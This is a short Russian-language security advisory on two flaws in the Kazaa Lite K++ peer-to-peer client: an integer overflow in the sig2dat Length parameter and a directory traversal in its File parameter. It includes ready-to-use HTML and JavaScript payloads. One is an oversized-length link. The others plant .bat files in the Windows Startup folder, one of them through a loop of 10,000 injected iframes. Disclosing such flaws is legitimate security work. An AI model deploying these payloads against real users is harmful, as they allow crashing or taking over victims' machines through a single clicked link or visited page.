Программа: Kazaa lite k++ 

Обнаружено две уязвимости в менеджере пиринговых сетей Kazaa. Удаленный пользователь может вызвать отказ в обслуживании или выполнить произвольный код на уязвимой системе. Удаленный пользователь может создать произвольное количество файлов на текущем разделе.

1. Целочисленное переполнение в протоколе Sig2Dat позволяет вызвать отказ в обслуживании или выполнить произвольный код на уязвимой системе. Уязвимость существует в параметре Length в байтах. Удаленный пользователь может передать значение превышающее 999999999 и вызвать переполнение целочисленных. Удачная эксплуатация уязвимости позволит выполнить произвольный код на целевой системе. 

Пример:

<A HREF="sig2dat://%7CFile:dev-catz5%28.bin%7CLength:
999999999999999999999999999%20Bytes,364489KB%7CUUHash:
=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK HERE</A> 

2. Уязвимость в параметре File позволяет выйти за пределы директории и создать файл в любом месте раздела используя символы перехода между каталогами (‘../’). 

Примеры:

<A href="https://xakep.ru/wp-content/uploads/post/25239/sig2dat://%7CFile:../../../../../../Docume~1/All Users/Start Menu/Programs/Startup/cool.bat%7CLength: 
373236528%20Bytes,364489KB%7CUUHash:= DEfm3HmvILkNcbY7j5NGa%2BD11CQ =
%7C/">CLICK HERE</A>

<script>
var i
for (i=1;i<10000;i++)
{
mylocation="<iframe src='sig2dat://% CFile:../../../../../../Docume~1/All Users /StartMenu/Programs/Startup/cool"+i+".bat %7CLength:373236528%20Bytes, 364489KB%
7CUUHash:= DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/'> </iframe>";
document.write(mylocation);
}
</script>

Оставить мнение